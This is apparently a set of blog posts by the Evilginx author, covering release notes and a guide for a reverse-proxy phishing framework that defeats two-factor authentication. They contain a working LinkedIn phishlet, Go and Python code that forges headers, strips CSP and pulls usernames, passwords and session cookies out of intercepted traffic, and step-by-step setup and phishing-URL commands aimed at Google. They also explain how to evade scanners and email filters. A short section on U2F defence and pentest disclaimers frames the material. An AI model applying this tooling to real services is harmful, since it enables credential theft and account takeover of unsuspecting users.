This is why FIDO Alliance introduced U2F (Universal 2nd Factor Authentication) to allow for unphishable 2nd factor authentication.

In short, you have a physical hardware key on which you just press a button when the website asks you to. Additionally, it may ask you for the account password or a complementary 4-digit PIN. The website talks directly with the hardware key plugged into your USB port, with the web browser as the channel provider for the communication.

What is different with this form of authentication is that the U2F protocol is designed to take the website's domain as one of the key components in negotiating the handshake. This means that if the domain in the browser's address bar does not match the domain used in the data transmission between the website and the U2F device, the communication will simply fail. This solution leaves no room for error and is totally unphishable using the Evilginx method.

Citing the vendor of U2F devices - Yubico (who co-developed U2F with Google):

With the YubiKey, user login is bound to the origin, meaning that only the real site can authenticate with the key. The authentication will fail on the fake site even if the user was fooled into thinking it was real. This greatly mitigates against the increasing volume and sophistication of phishing attacks and stops account takeovers.

It is important to note here that Markus Vervier (@marver) and Michele Orrù (@antisnatchor) did demonstrate a technique for attacking U2F devices using the newly implemented WebUSB feature in modern browsers (which allows websites to talk with USB-connected devices). It is also important to mention that Yubico, the creator of the popular U2F devices YubiKeys, tried to steal credit for their research, which they later apologized for.

You can find the list of all websites supporting U2F authentication here.

Coinciding with the release of Evilginx 2, WebAuthn is coming out in all major web browsers. It will introduce the new FIDO2 password-less authentication standard to every browser. Chrome, Firefox and Edge are about to receive full support for it.

To wrap up - if you often need to log into various services, make your life easier and get a U2F device! This will greatly improve your accounts' security.

Under the hood

Interception of HTTP packets is possible since Evilginx acts as an HTTP server talking to the victim's browser and, at the same time, as an HTTP client for the website to which the data is being relayed. To make it possible, the victim has to be contacting the Evilginx server through a custom phishing URL that points to the Evilginx server. Simply forwarding packets from the victim to the destination website would not work well and that's why Evilginx has to do some on-the-fly modifications.

In order for the phishing experience to be seamless, the proxy overcomes the following obstacles:

1. Making sure that the victim is not redirected to phished website's true domain.

Since the phishing domain will differ from the legitimate domain used by the phished website, relayed scripts and HTML data have to be carefully modified to prevent unwanted redirection of the victim's web browser. There will be HTML submit forms pointing to legitimate URLs, scripts making AJAX requests or JSON objects containing URLs.

Ideally, the most reliable way to solve it would be to perform a regular expression string substitution for any occurrence of https://legit-site.com, replacing it with https://our-phishing-site.com. Unfortunately this is not always enough and it requires some trial-and-error kung-fu, working with the web inspector to track down all strings the proxy needs to replace to not break the website's functionality. If the target website uses multiple options for 2FA, each route has to be inspected and analyzed.

For example, there are JSON objects transporting escaped URLs like https:\/\/legit-site.com. You can see that this will definitely not trigger the regexp mentioned above, and if you replaced all occurrences of legit-site.com, you might break something by accident.

2. Responding to DNS requests for multiple subdomains.

Websites will often make requests to multiple subdomains under their official domain or even use a totally different domain. In order to proxy these transmissions, Evilginx has to map each of the custom subdomains to its own IP address.

The previous version of Evilginx required the user to set up their own DNS server (e.g. bind) and configure DNS zones to properly handle DNS A requests. This generated a lot of headaches on the user's part and was only easier if the hosting provider (like Digital Ocean) offered an easy-to-use admin panel for setting up DNS zones.

With Evilginx 2 this issue is gone. Evilginx now runs its own in-built DNS server, listening on port 53, which acts as a nameserver for your domain. All you need to do is set up the nameserver addresses for your domain (ns1.yourdomain.com and ns2.yourdomain.com) to point to your Evilginx server IP, in the admin panel of your domain hosting provider. Evilginx will handle the rest on its own.

3. Modification of various HTTP headers.

Evilginx modifies HTTP headers sent to and received from the destination website. In particular, the Origin header in AJAX requests will always hold the URL of the requesting site in order to comply with CORS. Phishing sites will hold a phishing URL as an origin. When the request is forwarded, the destination website will receive an invalid origin and will not respond to such a request. Not replacing the phishing hostname with the legitimate one in the request would also make it easy for the website to notice suspicious behavior. Evilginx automatically changes the Origin and Referer fields on-the-fly to their legitimate counterparts.

In the same way, to avoid any conflicts with CORS from the other side, Evilginx makes sure to set the Access-Control-Allow-Origin header value to * (if it exists in the response) and removes any occurrences of Content-Security-Policy headers. This guarantees that no request will be restricted by the browser when AJAX requests are made.

Another header to modify is Location, which is set in HTTP 301 and 302 responses to redirect the browser to a different location. Naturally, the value will contain the legitimate website's URL and Evilginx makes sure this location is properly switched to the corresponding phishing hostname.
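
To make the idea concrete, here is a minimal sketch in Go of the header rewrites described in this section. This is not Evilginx's actual code, just an illustration built on the standard library's reverse proxy (hostnames hypothetical):

package main

import (
	"net/http"
	"net/http/httputil"
	"net/url"
	"strings"
)

func main() {
	target, _ := url.Parse("https://legit-site.com")
	proxy := httputil.NewSingleHostReverseProxy(target)

	director := proxy.Director
	proxy.Director = func(req *http.Request) {
		director(req)
		req.Host = target.Host
		// Swap the phishing origin for the legitimate one on the way out.
		if req.Header.Get("Origin") != "" {
			req.Header.Set("Origin", "https://legit-site.com")
		}
		if ref := req.Header.Get("Referer"); ref != "" {
			req.Header.Set("Referer", strings.Replace(ref, "our-phishing-site.com", "legit-site.com", 1))
		}
	}
	proxy.ModifyResponse = func(resp *http.Response) error {
		// Relax CORS, strip CSP and point redirects back at the phishing host.
		if resp.Header.Get("Access-Control-Allow-Origin") != "" {
			resp.Header.Set("Access-Control-Allow-Origin", "*")
		}
		resp.Header.Del("Content-Security-Policy")
		if loc := resp.Header.Get("Location"); loc != "" {
			resp.Header.Set("Location", strings.Replace(loc, "legit-site.com", "our-phishing-site.com", 1))
		}
		return nil
	}

	http.ListenAndServe(":8080", proxy) // TLS setup omitted for brevity
}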

4. Cookies filtering.

It is common for websites to manage cookies for various purposes. Each cookie is assigned to a specific domain and the web browser's task is to automatically send the stored cookie with every request to the domain the cookie was assigned to. Cookies are also sent as HTTP headers, but I decided to give them a separate mention here, due to their importance. An example cookie sent from the website to the client's web browser would look like this:

Set-Cookie: qwerty=219ffwef9w0f; Domain=legit-site.com; Path=/; Expires=Wed, 30 Aug 2019 00:00:00 GMT

As you can see, the cookie will be set in the client's web browser for the legit-site.com domain. Since the phishing victim is only talking to the phishing website with the domain our-phishing-site.com, such a cookie will never be saved in the browser, because the cookie domain differs from the one the browser is communicating with. Evilginx will parse every occurrence of Set-Cookie in HTTP response headers and modify the domain, replacing it with the phishing one, as follows:

Set-Cookie: qwerty=219ffwef9w0f; Domain=our-phishing-site.com; Path=/;

Evilginx will also remove the expiration date from cookies, unless the expiration date indicates that the cookie should be deleted from the browser's cache.

Evilginx also sends its own cookies to manage the victim's session. These cookies are filtered out from every HTTP request, to prevent them from being sent to the destination website.

5. SSL splitting.

As the whole world-wide-web migrates to serving pages over secure HTTPS connections, phishing pages can't fall behind. Whenever you pick a hostname for your phishing page (e.g. totally.not.fake.linkedin.our-phishing-domain.com), Evilginx will automatically obtain a valid SSL/TLS certificate from LetsEncrypt and provide responses to ACME challenges, using the in-built HTTP server.

This makes sure that victims will always see a green lock icon next to the URL address bar, when visiting the phishing page, comforting them that everything is secured using "military-grade" encryption!

6. Anti-phishing tricks

There are rare cases where websites employ defenses against being proxied. One such defense I uncovered during testing uses javascript to check if window.location contains the legitimate domain. These detections may be easy or hard to spot, and much harder to remove if additional code obfuscation is involved.
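
In its simplest form, such a check could look like the snippet below (a simplified illustration, not code from any specific website); unless the proxy rewrites the hostname string inside the script, the phishing page breaks or reveals itself:

if (window.location.hostname !== "legit-site.com") {
    window.location.href = "https://legit-site.com/";
}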

Improvements

The greatest advantage of Evilginx 2 is that it is now a standalone console application. There is no need to compile and install a custom version of nginx, which I admit was not a simple feat. I am sure that using nginx site configs to utilize the proxy_pass feature for phishing purposes was not what the HTTP server's developers had in mind when developing the software.

Evilginx 1 was pretty much a combination of several dirty hacks, duct taped together. Nonetheless it somehow worked!

In addition to the fully responsive console UI, here are the greatest improvements:

Tokenized phishing URLs

In the previous version of Evilginx, entering just the hostname of your phishing URL in the browser, with the root path (e.g. https://totally.not.fake.linkedin.our-phishing-domain.com/), would still proxy the connection to the legitimate website. This turned out to be an issue, as I found out during the development of Evilginx 2. Apparently, once you obtain SSL/TLS certificates for the domain/hostname of your choice, external scanners start scanning your domain. Scanners gonna scan.

The scanners use public certificate transparency logs to scan, in real-time, all domains which have obtained valid SSL/TLS certificates. With public libraries like CertStream, you can easily create your own scanner.

For some phishing pages, it usually took one hour for the hostname to get banned and blacklisted by popular anti-spam filters like Spamhaus. After I had three hostnames blacklisted for one domain, the whole domain got blocked. Three strikes and you're out!

I began thinking how such detection could be evaded. The easiest solution was to reply with a faked response to every request for the path /, but that would not work if scanners probed for any other path.

Then I decided that each phishing URL generated by Evilginx should come with a unique token, supplied as a GET parameter.

For example, Evilginx responds with a redirection response when a scanner makes a request to the URL:

https://totally.not.fake.linkedin.our-phishing-domain.com/auth/signin

But it responds with the proxied phishing page instead, when the URL is properly tokenized with a valid token:

https://totally.not.fake.linkedin.our-phishing-domain.com/auth/signin?tk=secret_l33t_token

When the tokenized URL is opened, Evilginx sets a validation cookie in the victim's browser, whitelisting all subsequent requests, even the non-tokenized ones.

This works very well, but there is still risk that scanners will eventually scan tokenized phishing URLs when these get out into the interwebz.

Hiding your phishlets

This thought provoked me to find a solution that allows manual control over when the phishing proxy should respond with the proxied website and when it should not. As a result, you can hide and unhide the phishing page whenever you want. A hidden phishing page will respond with a 302 HTTP redirection, redirecting the requester to a predefined URL (Rick Astley's famous clip on Youtube is the default).

Temporarily hiding your phishlet may be useful when you want to use a URL shortener to shorten your phishing URL (like goo.gl or bit.ly), or when you are sending the phishing URL via email and you don't want to trigger any email scanners on the way.

Phishlets

Phishlets are new site configs. They are plain-text ruleset files, in YAML format, which are fed into the Evilginx engine. Phishlets define which subdomains are needed to properly proxy a specific website, what strings should be replaced in relayed packets and which cookies should be captured, to properly take over the victim's account. There is one phishlet for each phished website. You can deploy as many phishlets as you want, with each phishlet set up for a different website. Phishlets can be enabled and disabled as you please and at any point Evilginx can be running and managing any number of them.

I will do a better job than I did last time, when I released Evilginx 1, and I will try to explain the structure of a phishlet and give you a brief insight into how phishlets are created (I promise to release a separate blog post about it later!).

I will dissect the LinkedIn phishlet for the purpose of this short guide:

name: 'linkedin'
author: '@mrgretzky'
min_ver: '2.0.0'
proxy_hosts:
  - {
      phish_sub: 'www',
      orig_sub: 'www',
      domain: 'linkedin.com',
      session: true,
      is_landing: true
    }
sub_filters:
  - {
      hostname: 'www.linkedin.com',
      sub: 'www',
      domain: 'linkedin.com',
      search: 'action="https://{hostname}',
      replace: 'action="https://{hostname}',
      mimes: ['text/html', 'application/json']
    }
  - {
      hostname: 'www.linkedin.com',
      sub: 'www',
      domain: 'linkedin.com',
      search: 'href="https://{hostname}',
      replace: 'href="https://{hostname}',
      mimes: ['text/html', 'application/json']
    }
  - {
      hostname: 'www.linkedin.com',
      sub: 'www',
      domain: 'linkedin.com',
      search: '//{hostname}/nhome/',
      replace: '//{hostname}/nhome/',
      mimes: ['text/html', 'application/json']
    }
auth_tokens:
  - domain: 'www.linkedin.com'
    keys: ['li_at']
user_regex:
  key: 'session_key'
  re: '(.*)'
pass_regex:
  key: 'session_password'
  re: '(.*)'
landing_path:
  - '/uas/login'

First things first. I advise you to get familiar with YAML syntax to avoid any errors when editing or creating your own phishlets.

Starting off with simple and rather self-explanatory variables: name is the name of the phishlet, which would usually be the name of the phished website. author is where you can do some self-promotion - this will be visible in Evilginx's UI when the phishlet is loaded. min_ver is currently not used, but will very likely be used when the phishlet format changes in future releases of Evilginx, to provide a way of checking a phishlet's compatibility with the current tool's version.

Following that, we have proxy_hosts. This array holds the sub-domains that Evilginx will manage. It provides the full list of hostnames for which you want to intercept the transmission, giving you the capability to make on-the-fly packet modifications.

  • phish_sub : subdomain name that will be prefixed in the phishlet's hostname. I advise leaving it the same as the original subdomain name, due to issues that may arise later when doing string replacements, as supporting custom subdomain names often requires additional work.
  • orig_sub : the original subdomain name as used on the legitimate website.
  • domain : website's domain that we are targeting.
  • session : set this to true ONLY for subdomains that will return authentication cookies. This indicates which subdomain Evilginx should recognize as the one that initiates the creation of an Evilginx session, and it sets the Evilginx session cookie for the domain name of this entry.
  • is_landing : set this to true if you want this subdomain to be used in the generation of phishing URLs later.

In the LinkedIn example, we only have one subdomain that we need to support, which is www. The phishing hostname for this subdomain will then be: www.totally.not.fake.linkedin.our-phishing-domain.com.

Next are sub_filters, which tell Evilginx all about string substitution magics.

  • hostname : original hostname of the website, for which the substitution will take place.
  • sub : subdomain name from the original hostname. This will only be used as a helper string in substitutions, which I explain below.
  • domain : domain name of the original hostname. Same as sub - used as a helper string in substitutions.
  • search : the regular expression of what to search for in HTTP packet's body. You can use some variables in {...} that Evilginx will prefill for you. I listed all supported variables below.
  • replace : the string that will act as a replacement for all occurrences of search regular expression matches. {...} variables are also supported here.
  • mimes : an array of MIME types that will be considered before doing search and replace. One of these defined MIME types must show up in the Content-Type header of the HTTP response before Evilginx considers doing any substitutions for that packet. The most common MIME types to use here are: text/html, application/json, application/javascript or text/javascript.
  • redirect_only : use this sub_filter only if a redirection URL is set in the generated phishing URL (true or false).

The following is a list of bracket variables that you can use in search and replace parameters:

  • {hostname} : a combination of the subdomain, defined by the sub parameter, and the domain, defined by the domain parameter. In the search field it will be translated to the original website's hostname (e.g. www.linkedin.com). In the replace field, it will be translated to the corresponding phishing hostname of the matching proxy_hosts entry (e.g. www.totally.not.fake.linkedin.our-phishing-domain.com).
  • {subdomain} : same as {hostname} but only for the subdomain.
  • {domain} : same as {hostname} but only for the domain.
  • {domain_regexp} : same as {domain} but translates to a properly escaped regular expression string. This can sometimes be useful when replacing anti-phishing protections in JavaScript that try to verify if window.location contains the legitimate domain.
  • {hostname_regexp} : same as above, but for the hostname.
  • {subdomain_regexp} : same as above, but for the subdomain.

In the example we have:

  - {
      hostname: 'www.linkedin.com',
      sub: 'www',
      domain: 'linkedin.com',
      search: 'action="https://{hostname}',
      replace: 'action="https://{hostname}',
      mimes: ['text/html', 'application/json']
    }

This will make Evilginx search for packets with a Content-Type of text/html or application/json and look for occurrences of action="https://www\.linkedin\.com (a properly escaped regexp). If found, it will replace every occurrence with action="https://www.totally.not.fake.linkedin.our-phishing-domain.com.

As you can see, this will replace the action URL of the login HTML form to have it point to the Evilginx server, so that the victim does not stray off the phishing path.
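
To make the variable expansion tangible, here is a minimal sketch of such a substitution in Python - the phishing domain is a stand-in and the expansion logic is simplified compared to what Evilginx does internally:

import re

PHISH_DOMAIN = 'totally.not.fake.linkedin.our-phishing-domain.com'  # stand-in

def apply_sub_filter(body, sub, domain, search, replace):
    orig_host = sub + '.' + domain         # www.linkedin.com
    phish_host = sub + '.' + PHISH_DOMAIN  # www.totally.not.fake...
    # {hostname} expands to the escaped original hostname in `search`
    # and to the phishing hostname in `replace`
    pattern = search.replace('{hostname}', re.escape(orig_host))
    replacement = replace.replace('{hostname}', phish_host)
    return re.sub(pattern, replacement, body)

html = '<form action="https://www.linkedin.com/uas/login-submit">'
print(apply_sub_filter(html, 'www', 'linkedin.com',
                       'action="https://{hostname}',
                       'action="https://{hostname}'))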

That was the most complicated part. The rest should be pretty straightforward.

Next up are auth_tokens. This is where you define the cookies that should be captured on successful login, which combined together provide the full state of the website's captured session. The cookies defined here, when obtained, can later be imported into any browser (using the EditThisCookie extension in Chrome) and let you be immediately logged into the victim's account, bypassing any 2FA challenges.

  • domain : original domain for which the cookies will be saved for.
  • keys : array of cookie names that should be captured.

In the example, there is only one cookie that LinkedIn uses to verify the session's state. Only the li_at cookie, saved for the www.linkedin.com domain, will be captured and stored.

Once Evilginx captures all of the defined cookies, it will display a message that authentication was successful and will store them in the database.
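
As an illustration, that completeness check could look like this minimal Python sketch (the data structures are made up for the example, not Evilginx internals):

auth_tokens = {'www.linkedin.com': ['li_at']}  # as defined in the phishlet

def all_tokens_captured(captured):
    # `captured` maps domain -> {cookie_name: value} intercepted so far
    for domain, names in auth_tokens.items():
        for name in names:
            if name not in captured.get(domain, {}):
                return False
    return True

print(all_tokens_captured({'www.linkedin.com': {'li_at': 'AQED...'}}))  # True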

The two following parameters are similar: user_regex and pass_regex. These define the POST request keys that should be searched for occurrences of usernames and passwords. Searching is defined by a regular expression that is run against the contents of the POST request's key value (a small sketch of this extraction follows the list below).

  • key : name of the POST request key.
  • re : regular expression defining what data should be captured from the key's value (e.g. (.*) will capture the whole value)
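
Here is a minimal sketch of that extraction in Python, assuming a raw application/x-www-form-urlencoded POST body - the key names and regular expressions come straight from the LinkedIn phishlet above:

import re
from urllib.parse import parse_qs

user_regex = {'key': 'session_key', 're': '(.*)'}
pass_regex = {'key': 'session_password', 're': '(.*)'}

def extract(post_body, cfg):
    params = parse_qs(post_body)
    for value in params.get(cfg['key'], []):
        match = re.search(cfg['re'], value)
        if match:
            return match.group(1)
    return None

body = 'session_key=victim%40example.com&session_password=hunter2'
print(extract(body, user_regex))  # victim@example.com
print(extract(body, pass_regex))  # hunter2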

The last parameter is the landing_path array, which holds URL paths to the login pages (usually one) of the phished website.

In our example, there is /uas/login, which translates to https://www.totally.not.fake.linkedin.our-phishing-domain.com/uas/login in the generated phishing URL.

Hope that sheds some light on how you can create your own phishlets and helps you understand the ones that are already shipped with Evilginx in the ./phishlets directory.

Future development

I'd like to continue working on Evilginx 2 and there are some things I have in mind that I want to eventually implement.

One such thing is serving an HTML page instead of a 302 redirect for hidden phishlets. This could be a page imitating CloudFlare's "checking your browser" screen that would wait in a loop and redirect to the phishing page as soon as you unhide your phishlet.


Another thing to have at some point is for Evilginx to launch as a daemon, without the UI.

Update: You can find out about the version 2.1 release here

Business Inquiries

If you are a red teaming company interested in development of custom phishing solutions, drop me a line and I will be happy to assist in any way I can.

If you are giving presentations on flaws of 2FA and/or promoting the use of FIDO U2F/FIDO2 devices, I'd love to hear how Evilginx can help you raise awareness.

In any case, send me an email at: [email protected]

I'll respond as soon as I can!

Credits

Since the release of Evilginx 1, in April last year, a lot has changed in my life for the better. I met a lot of wonderful, talented people, in front of whom I could exercise my impostor syndrome!

I'd like to thank a few people without whom this release would not have been possible:

@evilsocket - for letting me know that Evilginx is awesome, inspiring me to learn Go and for developing so many incredible products that I could steal borrow code from!

@antisnatchor and @h0wlu - for organizing WarCon and for inviting me!

@juliocesarfort and @Mario_Vilas - for organizing AlligatorCon and for being great reptiles!

@x33fcon - for organizing x33fcon and letting me do all these lightning talks!

Vincent Yiu (@vysecurity) - for all the red tips and invitations to secret security gatherings!

Kevin Mitnick (@kevinmitnick) - for giving Evilginx a try and making me realize its importance!

@i_bo0om - for giving me an idea to play with nginx's proxy_pass feature in his post.

Cristofaro Mune (@pulsoid) & Denis Laskov (@it4sec) - for spending their precious time to hear out my concerns about releasing such tool to the public.

Giuseppe "Ohpe" Trotta (@Giutro) - for a heads up that there may be other similar tools lurking around in the darkness ;)

#apt - everyone I met there, for sharing amazing contributions.

Thank you!

That's it! Thanks for making it through this overly long post!
Enjoy the tool and I'm waiting for your feedback!
>> Follow me on Twitter <<
>> Download Evilginx 2 from GitHub <<

Evilginx 1.1 Release

1 June 2017 at 04:03
Evilginx 1.1 Release

Hello! Today I am bringing you another release of Evilginx with more bug fixes and added features. The development is going very well and the feedback from you is terrific. I've managed to address most of the requests you sent me on GitHub and I hope to address even more in the future.

If you don't know what Evilginx is, feel free to check out the first post, where I explain the subject in detail.

You can go straight to the Evilginx project page on GitHub here:
>> Evilginx 1.1 on GitHub <<

Disclaimer

I am aware that Evilginx can be used for very nefarious purposes. This work is merely a demonstration of what adept attackers can and will do. It is the defender's responsibility to take such attacks into consideration, when setting up defenses, and find ways to protect against this phishing method.

Evilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.


Version 1.1

Here is the list of biggest improvements in version 1.1:

iCloud.com support

A new site config was added that allows proxying the login process of the iCloud page. This one also performs some on-the-fly modification of JavaScript content to disable several domain verifications. By far, this site config was the hardest to develop.

Live.com support

A site config for the Outlook/Hotmail page was added. It is fairly simple and should serve as a good reference for creating your own templates.

Added support for custom SSL/TLS certificates

If you don't want to use LetsEncrypt SSL/TLS certificates, you can now specify your own public certificate and private key when enabling the site config:

./evilginx.py setup --enable <site_name> -d <domain> --crt <path_to_public_cert_file> --key <path_to_private_key_file>

Evilginx will remember your site options

You don't have to specify the domain name or certificate paths every time you want to update your site config using the --enable parameter. If the site config was enabled and set up previously, its options will be stored in the .config file. All you need to do is enable the site config:

./evilginx.py setup --enable <site_name>

Added script that updates Nginx configuration files

From now on, after every update of Evilginx, you should execute the ./update.sh script, which will make sure that your Nginx configuration files are up to date. Fixes were made in this version to allow the web server to receive big upstream responses and to allow long hostnames (you can now specify a very long chain of subdomains for your phishing hostnames).

Fixed rare issue with parsing requests from log files

There was a known issue, specific to the Google site config. If the user put their email address into the form in the 1st step of the login process and, shortly after, the parsing script launched (by default it launches every minute) and truncated the log file, the intercepted email address would be lost forever, just before the user was about to enter their password.
The issue was fixed by leaving behind custom information with the last known parsed email for a specific IP address, in the log file, for the next parser execution.

How to update?

You can always find the latest version of Evilginx on GitHub:
>> Evilginx 1.1 on GitHub <<

# pull latest changes from GitHub
git pull
# run update script to make sure your Nginx configuration files are up-to-date
./update.sh
# re-enable every site config you may have been using to update them to their latest versions
./evilginx.py setup --enable <site_name>

Changelog

[+] Added iCloud.com support.
[+] Added Live.com support.
[+] Specifying domain name with 'setup --enable' is now optional if site was enabled before.
[+] Added ability to specify custom SSL/TLS certificates with --crt and --key arguments.
    Custom certificates will be remembered and can be removed with --use_letsencrypt parameter.
[+] Added 'server_names_hash_bucket_size: 128' to support long hostnames.
[+] Fixed rare issue, which could be triggered when only visitor's email was identified at the time
    of truncating logs, after parsing, breaking the chain of logged requests, which would miss an
    email address on next parse.
[+] Fixed several typos in site config files. (@poweroftrue)
[+] Fixed issue with Nginx proxy bailing out on receiving too big upstream responses.
[+] Fixed issue with Facebook overwriting redirection cookie with 'deleted' (@poweroftrue)
[+] Fixed "speedbump" redirection for Google site config that asks user to provide his phone number.
[+] Fixed bug that would raise exception when disabling site configs without them being enabled first.
[+] Nginx access_log directory can now be changed with VAR_LOGS constant in evilginx.py.
[+] Added 'update.sh' file which should be executed after every 'git pull' to update nginx config files.
[+] Added Dockerfile

Epilogue

I have added a development branch on GitHub where you can monitor all the latest changes. I make sure that this branch is as stable as it can get, but minor bugs may still appear before they are put to rest. If you have any pull requests of your own, please make sure to apply them to this branch.

Development branch can be found here:
Evilginx development branch

If you have any suggestions, ideas or feedback, make sure to post them in the comments section, but it is even better to post them under issues on GitHub.

I am constantly looking for interesting projects to work on!

Do not hesitate to contact me if you happen to be working on projects that require:

  • Reverse Engineering
  • Development of Security Software
  • Web / Mobile Application Penetration Testing
  • Offensive Tools for Red Team Assessments

Hit me up on Twitter @mrgretzky or directly via e-mail at [email protected].

Enjoy and see you soon!

Evilginx 1.0 Update - Up Your Game in 2FA Phishing

26 April 2017 at 04:26
Evilginx 1.0 Update - Up Your Game in 2FA Phishing

Welcome back! It's been just a couple of weeks since Evilginx release and I'm already swimming in amazing feedback. This encouraged me to spend more time on this project and make it better. The first release was more of a proof of concept, but now I want to make it a full-blown framework, which is going to be easily expandable. In other words, Evilginx is getting modular architecture, easy installation and support for lots of new site templates.

If you want to learn more about Evilginx and how it works, please refer to the previous post, which you can find here.

Looking just for the tool? You can always find it on GitHub at its most current version:
https://github.com/kgretzky/evilginx

Disclaimer: This project is released for educational purposes and should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.

Evilginx v.1.0 release

This week I'm releasing the product of several weeks of work, which is the official 1.0 release. I've redone some code and put the whole of Evilginx's functionality into a single script file. The directory structure was reorganized to better fit the modular architecture. From now on, site config templates, creds config files and additional config files are organized into separate directories. It should now be easy to add your own templates just by creating a new directory in the sites directory and populating it with the necessary config files. Evilginx will automatically detect site config presence by scanning the directory.

To summarize, here is the list of major additions and fixes:

New site config template system

As mentioned above, the new system makes it very easy to organize site templates and create new ones. All templates should be placed in separate directories under the sites directory.

One-shot fire & forget installation script (Debian only)

No more will you have to perform tedious, manual work like compiling OpenResty, setting up the Nginx daemon and gluing all the parts together. From now on, the whole Evilginx package can be installed by simply executing the install.sh script, which you can find in the project's root directory.

Evilginx.py script to setup, parse logs and generate URLs

In the root directory you will find the evilginx.py script, which, from now on, will act as the command center. It will install/uninstall site configs that you want to enable/disable in Nginx. It will parse the logs, harvesting login credentials and session cookies, and put them into a separate logs directory. It will also generate phishing URLs for you with a specified redirection URL, which is now base64 encoded to make it less obvious.

The script, when enabling site templates, will even allow you to set up log parsing to launch every minute. Additionally, it will do the hard job for you of obtaining LetsEncrypt SSL/TLS certificates and automatically renewing them, keeping them valid for eternity.

New site templates for popular websites

In order to figure out and introduce the structure for the modular architecture, I had to create several new templates for new sites. This allowed me to design the base of every template as the foundation of the new template system.

Here is the list of new site config templates, which were introduced with this release:

  • Facebook
  • Dropbox
  • Linkedin
  • New Google sign-in page

While preparing these, I've encountered several obstacles that I had to overcome using custom bypasses in LUA code.

Dropbox, for example, had an anti-CSRF protection that required the t POST parameter to be of the same value as the t cookie sent with the same POST request. The POST t value was not set automatically by the JavaScript code if the site's URL differed from dropbox.com, and that had to be fixed with custom LUA code.
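
For context, this double-submit-cookie protection boils down to a server-side check like the following Python sketch (simplified; not Dropbox's actual code):

def csrf_check(request_cookies, post_params):
    # the `t` POST parameter must match the `t` cookie sent with the same request
    cookie_t = request_cookies.get('t')
    return cookie_t is not None and cookie_t == post_params.get('t')

print(csrf_check({'t': 'abc123'}, {'t': 'abc123'}))  # True - request accepted
print(csrf_check({'t': 'abc123'}, {}))               # False - request rejected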

Facebook uses two versions of their site - one for desktop and one for mobile. If a mobile device is detected, the user is redirected to the m.facebook.com domain, which had to be proxied by adding an additional site config file.

The new Google sign-in page retrieves external JavaScript files from the ssl.gstatic.com domain, which had to be proxied separately. Otherwise, no data would be retrieved from the domain, due to strict Access-Control-Allow-Origin rules that disallow requests from domains not recognized by Google.

If you are interested in creating your own site templates, you may find the included ones very helpful in analyzing how to bypass possible issues you may encounter.


Here is the full CHANGELOG:

version 1.0 :
[+] Created central script for handling setup, parsing and generating urls.
[+] Added install.sh script that will single-handedly install Evilginx package on Debian.
[+] Added support for adding external site templates in framework-like manner.
[+] Added sites support for following websites: Facebook, Dropbox, Linkedin and new Google sign-in page.
[+] Reorganized code and directory structure to be more accessible for future development.
[+] Redirection URLs can now be embedded into phishing URLs using base64 encoding.
[+] Setup script allows to enable automatic logs parsing every minute.
[+] Setup script automatically handles SSL/TLS certificate retrieval from LetsEncrypt and its renewal.
[+] Added regular expressions for parsing POST arguments via .creds config files.
[+] Fixed: Opening Evilginx site via HTTP will now properly redirect to HTTPS.
[+] Fixed: 'Origin' and 'Referer' HTTP headers are now properly modified.
[+] Fixed: Minor bugs and stability issues.

Installation and Usage

I figured it would be wise to give you a step-by-step rundown of the updated Evilginx installation, on a fresh VPS Debian 8 (jessie) server, which you can easily host on DigitalOcean (this link gives you a $10 bonus).

Package installation

SSH to your new server, clone the Evilginx GitHub repository and launch the installation script:

apt-get update
apt-get -y install git
git clone https://github.com/kgretzky/evilginx.git
cd evilginx
chmod 700 install.sh
./install.sh

Note for previous Evilginx users: If you want to upgrade your installation, you may need to stop the Nginx service first with service nginx stop. Afterwards, you can launch ./install.sh normally.

This should take a while. If all went well, you should be up and running with the whole Evilginx package installed and ready to rock. If it didn't, submit an issue to GitHub's project page and I will take a look.

Now, let's list all available site templates:

python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

For the sake of this tutorial, we will enable the phishing site with the google site configuration. At this moment you should have already registered a domain that you will use with Evilginx. Let's assume that domain is not-really-google.com. You can register your domain at NameCheap.

Domain setup

You should point your new domain to DigitalOcean's nameservers and specify the A record for your domain on DigitalOcean, which will point to your VPS IP address.

Now for the important part. The listing of available sites includes the subdomains information. This is the list of required subdomains that need to be included in your DNS zone configuration for the Evilginx site config to function properly.

You need to create one CNAME entry for each listed subdomain and point it to your registered domain. For example, google requires two CNAME entries:

  1. accounts.not-really-google.com which will point to not-really-google.com.
  2. ssl.not-really-google.com which will point to not-really-google.com.

If you do not know how to do any of this, refer to excellent tutorials on DigitalOcean:

  1. How to Point to DigitalOcean Nameservers From Common Domain Registrars
  2. How To Set Up a Host Name with DigitalOcean

Enabling site config

The domain should now be properly set up and all required subdomains should also be pointing at the right place. We can now enable the google site configuration for Nginx.

python evilginx.py setup --enable google -d not-really-google.com

The -d not-really-google.com argument specifies the registered domain we own. Follow the prompts, answering Y to every question, and Evilginx should enable log auto-parsing and automatically retrieve SSL/TLS certificates from LetsEncrypt using Certbot.

You should verify that all went well; otherwise, you may need to troubleshoot what went wrong and verify that your DNS zones are configured properly. You may also need to give DNS settings a few hours to propagate, as it may not happen instantly.

Generating the phishing URLs

We will now generate our phishing URLs, which can be sent out:

python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ

The -r https://www.youtube.com/watch?v=dQw4w9WgXcQ argument specifies what URL the victim will be redirected to on successful login. In this scenario, it will be a rickroll video.

As you can see, Evilginx generated two URLs. This is because one is for the old Google sign-in page and the other one is for the new one. You can pick one or the other.
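
Looking closely at the generated URLs, the rc value is just the redirect URL encoded with URL-safe base64, padding stripped (the exact leading character Evilginx prepends is an implementation detail). A quick sketch of the idea in Python:

import base64

def encode_redirect(url):
    # URL-safe base64 without padding, as seen in the rc parameter
    return base64.urlsafe_b64encode(url.encode()).decode().rstrip('=')

def decode_redirect(data):
    return base64.urlsafe_b64decode(data + '=' * (-len(data) % 4)).decode()

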